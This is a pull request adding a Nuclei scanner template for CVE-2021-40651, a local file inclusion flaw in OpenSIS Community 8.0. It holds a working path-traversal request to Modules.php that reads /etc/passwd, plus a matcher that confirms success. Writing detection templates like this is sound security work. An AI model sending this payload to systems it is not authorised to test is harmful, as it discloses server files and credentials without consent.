### PR TITLE
Create CVE-2021-40651.yaml

### DIFF
--- a/http/cves/2021/CVE-2021-40651.yaml
+++ b/http/cves/2021/CVE-2021-40651.yaml
@@ -1,0 +1,36 @@
+id: CVE-2021-40651
+
+info:
+  name: OS4Ed OpenSIS Community 8.0 - Local File Inclusion
+  author: ctflearner
+  severity: medium
+  description: OS4Ed OpenSIS Community 8.0 is vulnerable to a local file inclusion vulnerability in Modules.php (modname parameter), which can disclose arbitrary file from the server's filesystem as long as the application has access to the file.
+  reference:
+    - https://nvd.nist.gov/vuln/detail/CVE-2021-40651
+    - https://www.exploit-db.com/exploits/50259
+    - https://github.com/MiSERYYYYY/Vulnerability-Reports-and-Disclosures/blob/main/OpenSIS-Community-8.0.md
+    - https://www.youtube.com/watch?v=wFwlbXANRCo
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
+    cvss-score: 6.5
+    cve-id: CVE-2021-40651
+    cwe-id: CWE-22
+    cpe: cpe:2.3:a:os4ed:opensis:8.0:*:*:*:community:*:*:*
+  tags: lfi,OS4Ed,OpenSIS
+  
+
+http:
+  - method: GET
+    path:
+      - "{{BaseURL}}/Modules.php?modname=miscellaneous%2fPortal.php..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd&failed_login="
+      
+    stop-at-first-match: true
+    matchers-condition: and
+    matchers:
+      - type: regex
+        regex:
+          - "root:.*:0:0:"
+
+      - type: status
+        status:
+          - 200


### PR DESCRIPTION
Added a New Nuclei Template CVE-2021-40651

### Template / PR Information

<!-- Explains the information and/or motivation for update or/ creating this templates -->
This Nuclei Template will check for local file inclusion vulnerability in OS4Ed OpenSIS Community v8.0  , at  Modules.php (modname parameter), which can disclose arbitrary file from the server's filesystem as long as the application has access to the file
<!-- Please include any reference to your template if available -->

-  Added CVE-2021-40651
- References: 
    - https://nvd.nist.gov/vuln/detail/CVE-2021-40651
    - https://www.exploit-db.com/exploits/50259
    - https://github.com/MiSERYYYYY/Vulnerability-Reports-and-Disclosures/blob/main/OpenSIS-Community-8.0.md
    - https://www.youtube.com/watch?v=wFwlbXANRCo

### Template Validation

I've validated this template locally?
- [ ] YES
- [ ] NO


#### Additional Details (leave it blank if not applicable)

<!-- Include Shodan / Fofa / Google Query / Docker / Screenshots if available -->
<!-- Include HTTP/TCP/DNS Matched response data snippet if available -->
<!-- Please do NOT include vulnerable host information in pull requests -->
<!-- None of the prerequisites are obligatory; they are merely intended to speed the review process. -->

### Additional References:

- [Nuclei Template Creation Guideline](https://nuclei.projectdiscovery.io/templating-guide/)
- [Nuclei Template Matcher Guideline](https://github.com/projectdiscovery/nuclei-templates/wiki/Unique-Template-Matchers)
- [Nuclei Template Contribution Guideline](https://github.com/projectdiscovery/nuclei-templates/blob/master/CONTRIBUTING.md)
- [PD-Community Discord server](https://discord.gg/projectdiscovery)